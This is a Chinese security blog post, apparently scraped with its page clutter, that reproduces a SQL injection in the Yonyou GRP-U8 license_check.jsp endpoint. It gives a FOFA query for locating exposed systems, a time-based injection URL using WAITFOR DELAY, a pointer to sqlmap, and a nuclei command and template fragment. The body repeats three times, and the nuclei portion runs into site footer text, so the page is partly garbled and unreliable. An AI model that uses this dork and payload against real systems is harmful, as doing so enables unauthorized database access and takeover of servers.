用友 GRP-U8 存在sql注入漏洞复现

0x01 漏洞介绍

用友 GRP-U8 license_check.jsp 存在sql注入，攻击者可利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

fofa：app=”用友-GRP-U8”

0x02 POC:

/u8qx/license_check.jsp?kjnd=1’;WAITFOR%20DELAY%20’0:0:3’—

0x03 sqlmap 一把梭哈

0x04 nuclei poc

命令：nuclei -t /nuclei-poc/yonyou/用友-GRP-U8+sql.yaml -uTrack 安全社区 — 掌控安全在线教育- Track 知识社区 – 掌控安全在线教育 – Powered by 掌控者

id: u8grp_license_checkinfo:name: 用友GRP-U8 License Check漏洞author: YourNameseverity: highrequests:- method: GETpath:- "{{BaseURL}}/u8qx/license_check.jsp" />

还没看够？可以关注~

`免费领取安全学习资料包！（私聊进群一起学习，共同进步）`

渗透工具

技术文档、书籍

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML，PHP，MySQL基础学习，信息收集，SQL注入,XSS，CSRF，暴力破解等等

应急响应笔记

学习路线

用友 GRP-U8 存在sql注入漏洞复现

0x01 漏洞介绍

用友 GRP-U8 license_check.jsp 存在sql注入，攻击者可利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

fofa：app=”用友-GRP-U8”

0x02 POC:

/u8qx/license_check.jsp?kjnd=1’;WAITFOR%20DELAY%20’0:0:3’—

0x03 sqlmap 一把梭哈

0x04 nuclei poc

命令：nuclei -t /nuclei-poc/yonyou/用友-GRP-U8+sql.yaml -uTrack 安全社区 — 掌控安全在线教育- Track 知识社区 – 掌控安全在线教育 – Powered by 掌控者

`免费领取安全学习资料包！（私聊进群一起学习，共同进步）`

`最新关注`

`热文推荐`

`一文搞懂scanf()读取字符%c`

`超适合初学者刷的170道C基础编程题选自牛客网个人超详细解析（有彩蛋哟~）`

`公网远程访问局域网SQL Server数据库【无公网IP内网穿透】`

`java：自定义变量加载到系统变量后替换shell模版并执行shell`

`【前端架构】前端通用架构`

`【C++】面向对象之宏观部分——类的层次结构与互相关系(has_a、use_a、is_a)`

用友 GRP-U8 存在sql注入漏洞复现

0x01 漏洞介绍

用友 GRP-U8 license_check.jsp 存在sql注入，攻击者可利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

fofa：app=”用友-GRP-U8”

0x02 POC:

/u8qx/license_check.jsp?kjnd=1’;WAITFOR%20DELAY%20’0:0:3’—

0x03 sqlmap 一把梭哈

0x04 nuclei poc

命令：nuclei -t /nuclei-poc/yonyou/用友-GRP-U8+sql.yaml -uTrack 安全社区 — 掌控安全在线教育- Track 知识社区 – 掌控安全在线教育 – Powered by 掌控者

免费领取安全学习资料包！（私聊进群一起学习，共同进步）<img decoding="async" class="aligncenter" src="https://img.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/696e6ebf81ba4e4088ab61199b458bbe.png" />

相关文章

最新关注

热文推荐

`免费领取安全学习资料包！（私聊进群一起学习，共同进步）`

`相关文章`

`最新关注`

`热文推荐`